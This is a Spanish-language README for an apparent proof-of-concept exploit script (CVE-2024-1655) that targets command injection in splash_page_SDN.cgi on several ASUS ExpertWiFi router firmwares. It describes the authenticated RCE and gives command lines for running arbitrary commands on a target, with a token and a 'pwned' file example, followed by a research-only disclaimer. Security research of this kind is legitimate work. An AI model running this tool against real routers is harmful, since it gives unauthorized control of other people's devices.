
Los firmware Go de ASUS ExpertWiFi EBM63, EBM68 y RT-AX57 Go anteriores al parche del 12-04-2024 contienen una vulnerabilidad de inyección de comandos en la función splash_page_SDN.cgi. Cuando un atacante envía una solicitud especialmente diseñada, puede lograr la ejecución de código arbitrario.
referencias:
La vulnerabilidad es un RCE autenticado; los usuarios de este script deben obtener primero el token de inicio de sesión (valor de asus_token de la cabecera Cookie) del objetivo.
$ python3 CVE-2024-1655.py --host <TARGET_HOST> --token <ASUS_TOKEN> <COMMAND>
Ejemplo: Crear un archivo en el directorio tmp
$ python3 CVE-2024-1655.py --host http://192.168.1.1:8080 --token pEnRts37WwOZT1qwwJjhRWFhfBLBmNQ "echo pwned > /tmp/pwn.txt"
El autor creó este software con el único propósito de investigación académica y para ayudar a comprender los riesgos de seguridad asociados. Además, este software no está destinado a utilizarse para atacar sistemas salvo que se cuente con autorización explícita. Los mantenedores del proyecto no son responsables ni están obligados por el uso indebido del software. Se recomienda un uso responsable.